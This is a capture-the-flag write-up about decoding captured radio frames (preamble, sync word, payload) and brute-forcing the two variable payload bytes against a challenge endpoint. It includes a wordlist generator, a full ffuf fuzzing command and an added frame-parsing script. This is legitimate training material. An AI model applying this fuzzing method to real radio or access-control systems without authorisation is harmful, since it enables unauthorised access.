Tags:
ctf
- Download Challenge files
- Open the files in e.g. Universal Radio Hacker
- Select “Show data as” and select “Hex”
- Each signal consists of a preamble, a sync word and the payload (shown in hex). Preamble: AAAAAAAA; sync word: 73214693; payloads: A2FF84, A1FF14, B2FF24 and B1FF57
- The preamble, sync word and the middle FF byte are constant across captures, so the idea is to fuzz the variable bytes on either side of the FF in the payload
- Create a wordlist for the fuzzer (one two-digit hex value per line, 00 to ff); redirect the output to a file, e.g. `python3 gen.py > 00_ff.lst`

```python
#!/usr/bin/env python3
# Print every single-byte value as two lowercase hex digits, one per line.
for i in range(0x00, 0xff + 1):
    print(f'{i:02x}')
```
- Use the list with e.g. ffuf, substituting the two variable bytes with the keywords W1 and W2

```sh
ffuf -w 00_ff.lst:W1,00_ff.lst:W2 -u http://<ip>:<port>/transmit -X POST -H "Content-Type: application/x-www-form-urlencoded" -d 'pa=AAAAAAAA&sw=73214693&pl=W1ffW2' -c -fw 403
```
- `-fw 403` filters out responses whose word count is 403 (the default/rejection response); run once without the filter to observe the common response and pick the word count to filter on
- What remains are the W1/W2 combinations that produced a different response, and the flag is in that response content
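As an added example (not part of the original writeup), a small parser that splits the captured frames into preamble, sync word and payload, validates the fixed fields, and computes which payload byte positions stay constant across captures. The `Frame`, `parse_frame` and `constant_positions` names are hypothetical; the field values are the ones from the captures above.

```python
#!/usr/bin/env python3
"""Parse hex captures into preamble / sync / payload and find the constant bytes."""
from dataclasses import dataclass

PREAMBLE = "AAAAAAAA"   # fixed preamble seen in the captures
SYNC_WORD = "73214693"  # fixed sync word seen in the captures


@dataclass
class Frame:
    preamble: str
    sync: str
    payload: bytes


def parse_frame(hex_str: str) -> Frame:
    """Split one hex-encoded capture into its three fields; reject bad headers."""
    h = hex_str.strip().upper()
    if len(h) % 2 or len(h) < len(PREAMBLE) + len(SYNC_WORD) + 2:
        raise ValueError("frame too short or odd-length hex")
    pre, sync, pl = h[:8], h[8:16], h[16:]
    if pre != PREAMBLE:
        raise ValueError(f"unexpected preamble {pre}")
    if sync != SYNC_WORD:
        raise ValueError(f"unexpected sync word {sync}")
    return Frame(pre, sync, bytes.fromhex(pl))


def constant_positions(payloads: list[bytes]) -> dict[int, int]:
    """Return {index: value} for payload bytes identical in every capture."""
    if not payloads or len({len(p) for p in payloads}) != 1:
        raise ValueError("need at least one payload, all of the same length")
    first = payloads[0]
    return {i: first[i] for i in range(len(first))
            if all(p[i] == first[i] for p in payloads)}


def variable_positions(payloads: list[bytes]) -> list[int]:
    """Indices not constant across captures: the bytes worth enumerating."""
    fixed = constant_positions(payloads)
    return [i for i in range(len(payloads[0])) if i not in fixed]


# Constructed captures: the four observed payloads behind the fixed header.
CAPTURES = [PREAMBLE + SYNC_WORD + p for p in ("A2FF84", "A1FF14", "B2FF24", "B1FF57")]

if __name__ == "__main__":
    pls = [parse_frame(c).payload for c in CAPTURES]
    print("constant bytes:", {i: f"{v:02X}" for i, v in constant_positions(pls).items()})
    print("variable byte positions:", variable_positions(pls))
```

Running it reports byte 1 as the constant FF and positions 0 and 2 as the variable ones, which is exactly the W1ffW2 shape the ffuf command fuzzes.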